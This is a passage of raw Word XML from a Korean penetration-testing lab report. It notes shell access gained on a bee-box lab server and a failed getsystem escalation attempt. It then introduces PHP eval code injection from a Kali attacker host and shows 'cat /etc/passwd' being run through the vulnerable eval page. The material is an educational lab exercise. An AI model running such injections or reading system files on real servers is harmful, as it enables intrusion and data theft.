          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>정상적으로 쉘 권한을 얻었으며,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>이를 통하여 서버 정보를 탈취할 수 있다.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Getsystem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> 명령어를 통하여 우회해서라도 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>권한까지 얻으려고 시도하였으나,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> bee-box </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>서버 특성상 구현되어 있지 않았다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="712DFDA7" w14:textId="64D62AA4" w:rsidR="006C5A52" w:rsidRDefault="006C5A52" w:rsidP="00F02B2A">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="146770E7" wp14:editId="4401C3DC">
            <wp:extent cx="5991367" cy="2852420"/>
            <wp:effectExtent l="0" t="0" r="9525" b="508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206" cy="28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05743" w14:textId="63C0682D" w:rsidR="006C5A52" w:rsidRDefault="006C5A52" w:rsidP="00F02B2A">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67696115" w14:textId="50BE618F" w:rsidR="006C5A52" w:rsidRDefault="006C5A52" w:rsidP="00F02B2A">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32B17940" w14:textId="5D855EF8" w:rsidR="006C5A52" w:rsidRDefault="006C5A52" w:rsidP="00F02B2A">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60993E50" w14:textId="71F86451" w:rsidR="006C5A52" w:rsidRDefault="006C5A52" w:rsidP="00F02B2A">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="612D6EC9" w14:textId="26FFFC7F" w:rsidR="006C5A52" w:rsidRDefault="006C5A52" w:rsidP="00F02B2A">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4586680E" w14:textId="5052CBB5" w:rsidR="006C5A52" w:rsidRDefault="006C5A52" w:rsidP="00F02B2A">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="135DCACE" w14:textId="1039F178" w:rsidR="006C5A52" w:rsidRDefault="006C5A52" w:rsidP="00F02B2A">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19F137A7" w14:textId="55F0B7D7" w:rsidR="006C5A52" w:rsidRDefault="006C5A52" w:rsidP="00F02B2A">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CF47944" w14:textId="12326B37" w:rsidR="00FD4CF4" w:rsidRPr="00EF724A" w:rsidRDefault="00FD4CF4" w:rsidP="00EF724A">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="a3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2"/>
      </w:tblGrid>
      <w:tr w:rsidR="00FD4CF4" w:rsidRPr="00BE7966" w14:paraId="5BD1A55C" w14:textId="77777777" w:rsidTr="00EF724A">
        <w:trPr>
          <w:trHeight w:val="80"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10902" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="thinThickThinSmallGap" w:sz="24" w:space="0" w:color="204E5F"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="69DCEF35" w14:textId="77777777" w:rsidR="00FD4CF4" w:rsidRPr="00BE7966" w:rsidRDefault="00FD4CF4" w:rsidP="002237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6496" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="62CE2107" wp14:editId="12C3A9AA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49" name="직사각형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50924" id="직사각형 49" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:-4.65pt;margin-top:-666.75pt;width:533.25pt;height:550.5pt;z-index:-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FD4CF4" w:rsidRPr="0050741D" w14:paraId="63B7851C" w14:textId="77777777" w:rsidTr="00EF724A">
        <w:trPr>
          <w:trHeight w:val="445"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10902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14C1A3D9" w14:textId="2C8CB1BB" w:rsidR="00FD4CF4" w:rsidRPr="0050741D" w:rsidRDefault="00FD4CF4" w:rsidP="0022375D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 w:rsidRPr="0050741D">
              <w:rPr>
                <w:rFonts w:ascii="DX국민시대" w:eastAsia="DX국민시대" w:hAnsi="DX국민시대" w:hint="eastAsia"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r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(</w:t>
            </w:r>
            <w:r w:rsidR="001653FA">
              <w:rPr>
                <w:rFonts w:ascii="DX국민시대" w:eastAsia="DX국민시대" w:hAnsi="DX국민시대"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="DX국민시대" w:eastAsia="DX국민시대" w:hAnsi="DX국민시대"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>)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 </w:t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>:</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="DX국민시대" w:eastAsia="DX국민시대" w:hAnsi="DX국민시대"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="004F401A">
              <w:rPr>
                <w:rFonts w:ascii="DX국민시대" w:eastAsia="DX국민시대" w:hAnsi="DX국민시대"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>PHP Eval Function</w:t>
            </w:r>
            <w:r w:rsidR="004E39D5">
              <w:rPr>
                <w:rFonts w:ascii="DX국민시대" w:eastAsia="DX국민시대" w:hAnsi="DX국민시대"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t xml:space="preserve"> +</w:t>
            </w:r>
            <w:r w:rsidR="00EF724A">
              <w:rPr>
                <w:rFonts w:ascii="DX국민시대" w:eastAsia="DX국민시대" w:hAnsi="DX국민시대"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00EF724A">
              <w:rPr>
                <w:rFonts w:ascii="DX국민시대" w:eastAsia="DX국민시대" w:hAnsi="DX국민시대" w:hint="eastAsia"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>P</w:t>
            </w:r>
            <w:r w:rsidR="00EF724A">
              <w:rPr>
                <w:rFonts w:ascii="DX국민시대" w:eastAsia="DX국민시대" w:hAnsi="DX국민시대"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>HP</w:t>
            </w:r>
            <w:r w:rsidR="004E39D5">
              <w:rPr>
                <w:rFonts w:ascii="DX국민시대" w:eastAsia="DX국민시대" w:hAnsi="DX국민시대"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t xml:space="preserve"> Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FD4CF4" w:rsidRPr="00522648" w14:paraId="7F03A315" w14:textId="77777777" w:rsidTr="00EF724A">
        <w:trPr>
          <w:trHeight w:val="424"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10902" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="B7D7D8"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="127A75BE" w14:textId="77777777" w:rsidR="00FD4CF4" w:rsidRPr="00522648" w:rsidRDefault="00FD4CF4" w:rsidP="00FD4CF4">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="46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522648">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">공격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개념</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FD4CF4" w:rsidRPr="00BE7966" w14:paraId="29BA6DEA" w14:textId="77777777" w:rsidTr="00EF724A">
        <w:trPr>
          <w:trHeight w:val="424"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10902" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="66DEF2C9" w14:textId="7DCA1D1A" w:rsidR="00FD4CF4" w:rsidRDefault="0004176F" w:rsidP="002237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565788DD" wp14:editId="775090F5">
                  <wp:extent cx="6646545" cy="3138985"/>
                  <wp:effectExtent l="0" t="0" r="1905" b="4445"/>
                  <wp:docPr id="101" name="그림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234" cy="3142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F4B8F5" w14:textId="77777777" w:rsidR="0004176F" w:rsidRDefault="0004176F" w:rsidP="002237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tbl>
            <w:tblPr>
              <w:tblStyle w:val="a3"/>
              <w:tblW w:w="106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86"/>
            </w:tblGrid>
            <w:tr w:rsidR="00EF724A" w:rsidRPr="00D6576D" w14:paraId="73161F1C" w14:textId="77777777" w:rsidTr="008A727E">
              <w:trPr>
                <w:trHeight w:val="424"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="10686" w:type="dxa"/>
                  <w:vAlign w:val="center"/>
                </w:tcPr>
                <w:p w14:paraId="2EC91422" w14:textId="20685F08" w:rsidR="00EF724A" w:rsidRPr="00D6576D" w:rsidRDefault="004F401A" w:rsidP="00EF724A">
                  <w:pPr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e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val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함수는 문자열을 입력 받아 수식 계산하여 처리한 결과값을 반환하는 함수이다.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이떄</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/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,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문자를 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PHP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함수로 인식하여 출력하는 취약점을 갖고 있다.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따라서 공격자가 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eval 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함수를 사용하는 것을 식별한다면 취약점을 이용하여 악성 쿼리문을 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injection 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할 수 있다.</w:t>
                  </w:r>
                  <w:r w:rsidR="00DC005D"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 </w:t>
                  </w:r>
                  <w:r w:rsidR="0004176F"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이 취약점은 </w:t>
                  </w:r>
                  <w:r w:rsidR="0004176F"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CVE </w:t>
                  </w:r>
                  <w:r w:rsidR="0004176F"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홈페이지에서도 확인할 수 있듯이,</w:t>
                  </w:r>
                  <w:r w:rsidR="0004176F"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 2020</w:t>
                  </w:r>
                  <w:r w:rsidR="0004176F"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년에도 지속되는 취약점이며,</w:t>
                  </w:r>
                  <w:r w:rsidR="0004176F"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 eval </w:t>
                  </w:r>
                  <w:r w:rsidR="0004176F"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함수를 사용하는 한 계속해서 위험의 소지가 있다.</w:t>
                  </w:r>
                  <w:r w:rsidR="0004176F"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 </w:t>
                  </w:r>
                  <w:r w:rsidR="00DC005D"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간단한 테스트를 통해 취약점을 확인해보자.</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00EF724A" w:rsidRPr="00BE7966" w14:paraId="5EEDF9D5" w14:textId="77777777" w:rsidTr="008A727E">
              <w:trPr>
                <w:trHeight w:val="424"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="10686" w:type="dxa"/>
                  <w:tcBorders>
                    <w:top w:val="thinThickThinSmallGap" w:sz="24" w:space="0" w:color="204E5F"/>
                  </w:tcBorders>
                  <w:vAlign w:val="center"/>
                </w:tcPr>
                <w:p w14:paraId="32B46F4E" w14:textId="77777777" w:rsidR="00EF724A" w:rsidRDefault="00EF724A" w:rsidP="00EF724A">
                  <w:pPr>
                    <w:pStyle w:val="a4"/>
                    <w:ind w:leftChars="0" w:left="360"/>
                    <w:jc w:val="righ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실습 환경</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="4F1EE02C" w14:textId="77777777" w:rsidR="00EF724A" w:rsidRDefault="00EF724A" w:rsidP="00EF724A">
                  <w:pPr>
                    <w:pStyle w:val="a4"/>
                    <w:ind w:leftChars="0" w:left="360"/>
                    <w:jc w:val="righ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공격 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PC(Kali </w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/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linux</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:proofErr w:type="gramStart"/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) :</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/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 192.168.0.90/24</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="6E8AD3D8" w14:textId="77777777" w:rsidR="00EF724A" w:rsidRPr="00BE7966" w:rsidRDefault="00EF724A" w:rsidP="00EF724A">
                  <w:pPr>
                    <w:pStyle w:val="a4"/>
                    <w:ind w:leftChars="0" w:left="360"/>
                    <w:jc w:val="righ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대상 PC(b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ee box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): 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192.168.0.9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/2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4</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00EF724A" w:rsidRPr="00522648" w14:paraId="20C88212" w14:textId="77777777" w:rsidTr="008A727E">
              <w:trPr>
                <w:trHeight w:val="424"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="10686" w:type="dxa"/>
                  <w:shd w:val="clear" w:color="auto" w:fill="B7D7D8"/>
                  <w:vAlign w:val="center"/>
                </w:tcPr>
                <w:p w14:paraId="6A963DAA" w14:textId="77777777" w:rsidR="00EF724A" w:rsidRPr="00522648" w:rsidRDefault="00EF724A" w:rsidP="00EF724A">
                  <w:pPr>
                    <w:pStyle w:val="a4"/>
                    <w:numPr>
                      <w:ilvl w:val="0"/>
                      <w:numId w:val="46"/>
                    </w:numPr>
                    <w:ind w:leftChars="0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공격 수행</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="2EAB4781" w14:textId="77777777" w:rsidR="00FD4CF4" w:rsidRDefault="00FD4CF4" w:rsidP="002237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1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. Bash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환경변수 설정</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4925B304" w14:textId="7EC4CE42" w:rsidR="00FD4CF4" w:rsidRDefault="00FD4CF4" w:rsidP="002237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 w:rsidR="00DC005D">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>kali</w:t>
            </w:r>
            <w:r w:rsidR="00DC005D">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">에서 </w:t>
            </w:r>
            <w:r w:rsidR="00DC005D">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">apache2 </w:t>
            </w:r>
            <w:r w:rsidR="00DC005D">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>서버를 구동해준 뒤 해당 경로(</w:t>
            </w:r>
            <w:r w:rsidR="00DC005D">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>var/www/html)</w:t>
            </w:r>
            <w:r w:rsidR="00DC005D">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">에 다음과 같은 </w:t>
            </w:r>
            <w:r w:rsidR="00DC005D">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>php</w:t>
            </w:r>
            <w:r w:rsidR="00DC005D">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>파일</w:t>
            </w:r>
            <w:r w:rsidR="00EF724A">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00EF724A">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>eval_test.php</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00EF724A">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
            <w:r w:rsidR="00DC005D">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>을 작성한다.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0AE7A8AB" w14:textId="5AD22D52" w:rsidR="00DC005D" w:rsidRDefault="0004176F" w:rsidP="002237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19B20C60" wp14:editId="68D5FBAA">
                      <wp:simplePos x="0" y="0"/>
                      <wp:positionH relativeFrom="column">
                        <wp:posOffset>2320925</wp:posOffset>
                      </wp:positionH>
                      <wp:positionV relativeFrom="paragraph">
                        <wp:posOffset>2729230</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="2831465" cy="307340"/>
                      <wp:effectExtent l="19050" t="19050" r="26035" b="16510"/>
                      <wp:wrapNone/>
                      <wp:docPr id="52" name="직사각형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1465" cy="3073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5550A" id="직사각형 52" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:182.75pt;margin-top:214.9pt;width:222.95pt;height:24.2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" filled="f" strokecolor="red" strokeweight="2.25pt"/>
                  </w:pict>
                </mc:Fallback>
              </mc:AlternateContent>
            </w:r>
            <w:r w:rsidR="00DC005D"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530A6026" wp14:editId="7424A1EA">
                  <wp:extent cx="5260338" cy="3043451"/>
                  <wp:effectExtent l="0" t="0" r="0" b="5080"/>
                  <wp:docPr id="82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0704" cy="3055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132555" w14:textId="3B522E97" w:rsidR="00DC005D" w:rsidRDefault="00DC005D" w:rsidP="002237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46518648" w14:textId="6A651CB0" w:rsidR="00FD4CF4" w:rsidRDefault="00DC005D" w:rsidP="002237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이를 웹 브라우저에서 확인해보면 다음과 같은 결과를 확인할 수 있다.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="43BC5EE9" wp14:editId="3C648332">
                  <wp:extent cx="5284519" cy="1983105"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="83" name="그림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756" cy="1983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994C3A" w14:textId="10C443C5" w:rsidR="00FD4CF4" w:rsidRDefault="00FD4CF4" w:rsidP="002237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540E1F44" w14:textId="6A59D5D4" w:rsidR="00FD4CF4" w:rsidRDefault="00DC005D" w:rsidP="002237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c</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>at 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etc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/passwd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명령어의 결과가 그대로 출력된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(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다른 곳에 삽입 시 원래 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>cat</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>~  text</w:t>
            </w:r>
            <w:proofErr w:type="gram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그 자체로 출력됨)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="71827528" w14:textId="350C7E79" w:rsidR="004E39D5" w:rsidRDefault="00DC005D" w:rsidP="002237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이러한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eval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함수의 취약점을 </w:t>
            </w:r>
            <w:r w:rsidR="004E39D5">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>php</w:t>
            </w:r>
            <w:r w:rsidR="004E39D5">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>파일에 삽입하여 공격할 수 있겠다. 이 취약점을 활용해보기 위하여</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5DA161B7" w14:textId="3F3A28A4" w:rsidR="004E39D5" w:rsidRDefault="004E39D5" w:rsidP="002237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p</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>hp code injection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을 해보도록 한다.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3535E409" w14:textId="70550638" w:rsidR="004E39D5" w:rsidRDefault="0022375D" w:rsidP="002237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0A604B6B" wp14:editId="7709F24C">
                      <wp:simplePos x="0" y="0"/>
                      <wp:positionH relativeFrom="column">
                        <wp:posOffset>3342640</wp:posOffset>
                      </wp:positionH>
                      <wp:positionV relativeFrom="paragraph">
                        <wp:posOffset>1667510</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="847725" cy="135255"/>
                      <wp:effectExtent l="19050" t="19050" r="28575" b="17145"/>
                      <wp:wrapNone/>
